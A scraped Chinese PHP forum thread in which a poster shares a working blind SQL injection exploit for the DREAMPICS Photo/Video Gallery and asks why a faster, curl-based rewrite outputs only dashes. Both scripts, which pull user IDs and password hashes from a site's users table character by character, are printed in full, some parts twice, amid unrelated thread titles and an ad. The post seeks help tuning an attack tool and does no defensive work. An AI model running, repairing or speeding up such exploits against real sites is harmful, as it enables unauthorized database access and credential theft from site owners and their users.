这代码有什么问题吗?帮忙看看谢谢~ 本帖最后由 notask 于 2009-09-08 11:02:54 编辑 解决方案 » 免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货 未修改的,可以正常运行,通过注入获取到密码<?phpini_set("max_execution_time",0);print_r('################################################################################ DREAMPICS Photo/Video Gallery Blind SQL Injection Exploit## ---->>>> xoron <<<<<-----# [email protected]# XORON (c) 2009## WARNING!: php xoron.php "http://www.xoronk1ng./[PATH]/index.php?fuseaction=gallery.viewPhotos&exhibition_id=13"###############################################################################');if ($argc > 1) {$url = $argv[1];$r = strlen(file_get_contents($url."+and+1=1--"));echo "\nExploiting:\n";$w = strlen(file_get_contents($url."+and+1=0--"));$t = abs((100-($w/$r*100)));echo "\nPassword: ";for ($j = 1; $j <= 32; $j++) { for ($i = 46; $i <= 102; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+users+limit+0,1),".$j.",1))%3E".$i."--")); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+users+limit+0,1),".$j.",1))%3E".($i-1)."--")); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 102; } }}}?>因为上面这个百次执行的,效率非常低,速度太慢,我叫人改了一下,但是改完之后,得出的密码都变成---------------------了奇怪,谁看下?这个是修改过之后的。。<?phpfunction get_remote_file_siz($remoteFile){ $ch = curl_init($remoteFile); curl_setopt($ch, CURLOPT_NOBODY, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); //not necessary unless the file redirects (like the PHP example we're using here) $data = curl_exec($ch); curl_close($ch); if ($data === false) { echo 'cURL failed'; exit; } $contentLength = 'unknown'; $status = 'unknown'; if (preg_match('/^HTTP\/1\.[01] (\d\d\d)/', $data, $matches)) { $status = (int)$matches[1]; } if (preg_match('/Content-Length: (\d+)/', $data, $matches)) { $contentLength = (int)$matches[1]; } return $contentLength;}ini_set("max_execution_time",0);print_r('################################################################################123### : Usage :#php file.php "http://site/123.php?fid=11"################################################################################');if ($argc > 1) {$url = $argv[1];$r = max(1,get_remote_file_siz($url."+and+1=1--"));echo "\nExploiting:\n";$w = get_remote_file_siz($url."+and+1=0--");$t = abs((100-($w/$r*100)));echo "id: ";for ($i=1; $i <= 30; $i++) {$laenge = get_remote_file_siz($url."+and+ascii(substring((select+uid+from+users+limit+0,1),".$i.",1))!=0--"); if (abs((100-($laenge/$r*100))) > $t-1) { $count = $i; $i = 30; }}for ($j = 1; $j < $count; $j++) { for ($i = 46; $i <= 122; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = get_remote_file_siz($url."+and+ascii(substring((select+uid+from+users+limit+0,1),".$j.",1))%3E".$i."--"); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = get_remote_file_siz($url."+and+ascii(substring((select+uid+from+users+limit+0,1),".$j.",1))%3E".($i-1)."--"); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 122; } }}echo "\nPassword: ";for ($j = 1; $j <= 32; $j++) { for ($i = 46; $i <= 102; $i=$i+2) { if ($i == 60) { $i = 98; } $laenge = get_remote_file_siz($url."+and+ascii(substring((select+password+from+users+limit+0,1),".$j.",1))%3E".$i."--"); if (abs((100-($laenge/$r*100))) > $t-1) { $laenge = get_remote_file_siz($url."+and+ascii(substring((select+password+from+users+limit+0,1),".$j.",1))%3E".($i-1)."--"); if (abs((100-($laenge/$r*100))) > $t-1) { echo chr($i-1); } else { echo chr($i); } $i = 102; } }}}?> 【新手上路】mysql连接问题,大牛解答下 PHP中有网页超时触发事件吗?我需要在超时的时候确定用户不在线怎么办?请各位高手指点 修改php.ini后phpinfo()显示的还是之前默认的值? 求助 onmousemove 事件重复调用,怎样避免啊 通过网站域名查找邮箱地址 php调用可执行文件,怎么不管用呢 如何检测一个变量是否存在 怎么配置PHP才能让它把所有的错误和警告全都显示出来? 求职:广州有没有公司请Delphi或PHP程序员呢? 哪个PHP editor 比较简单实用? php初学者需要帮助啊 Apache
ini_set("max_execution_time",0);
print_r('
##############################################################################
#
# DREAMPICS Photo/Video Gallery Blind SQL Injection Exploit
#
# ---->>>> xoron <<<<<-----
# [email protected]
# XORON (c) 2009
#
# WARNING!: php xoron.php "http://www.xoronk1ng./[PATH]/index.php?fuseaction=gallery.viewPhotos&exhibition_id=13"
#
##############################################################################
');
if ($argc > 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));echo "\nPassword: ";
for ($j = 1; $j <= 32; $j++) {
for ($i = 46; $i <= 102; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+users+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
}
?>
因为上面这个百次执行的,效率非常低,速度太慢,我叫人改了一下,但是改完之后,得出的密码都变成---------------------了奇怪,谁看下?这个是修改过之后的。。<?php
function get_remote_file_siz($remoteFile)
{
$ch = curl_init($remoteFile);
curl_setopt($ch, CURLOPT_NOBODY, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); //not necessary unless the file redirects (like the PHP example we're using here)
$data = curl_exec($ch);
curl_close($ch);
if ($data === false) {
echo 'cURL failed';
exit;
} $contentLength = 'unknown';
$status = 'unknown';
if (preg_match('/^HTTP\/1\.[01] (\d\d\d)/', $data, $matches)) {
$status = (int)$matches[1];
}
if (preg_match('/Content-Length: (\d+)/', $data, $matches)) {
$contentLength = (int)$matches[1];
}
return $contentLength;
}ini_set("max_execution_time",0);
print_r('
##############################################################################
#
#123
#
#
# : Usage :
#php file.php "http://site/123.php?fid=11"
#
#
##############################################################################
');
if ($argc > 1) {
$url = $argv[1];
$r = max(1,get_remote_file_siz($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = get_remote_file_siz($url."+and+1=0--");
$t = abs((100-($w/$r*100)));
echo "id: ";
for ($i=1; $i <= 30; $i++) {
$laenge = get_remote_file_siz($url."+and+ascii(substring((select+uid+from+users+limit+0,1),".$i.",1))!=0--");
if (abs((100-($laenge/$r*100))) > $t-1) {
$count = $i;
$i = 30;
}
}
for ($j = 1; $j < $count; $j++) {
for ($i = 46; $i <= 122; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = get_remote_file_siz($url."+and+ascii(substring((select+uid+from+users+limit+0,1),".$j.",1))%3E".$i."--");
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = get_remote_file_siz($url."+and+ascii(substring((select+uid+from+users+limit+0,1),".$j.",1))%3E".($i-1)."--");
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 122;
}
}
}
echo "\nPassword: ";
for ($j = 1; $j <= 32; $j++) {
for ($i = 46; $i <= 102; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = get_remote_file_siz($url."+and+ascii(substring((select+password+from+users+limit+0,1),".$j.",1))%3E".$i."--");
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = get_remote_file_siz($url."+and+ascii(substring((select+password+from+users+limit+0,1),".$j.",1))%3E".($i-1)."--");
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
}
?>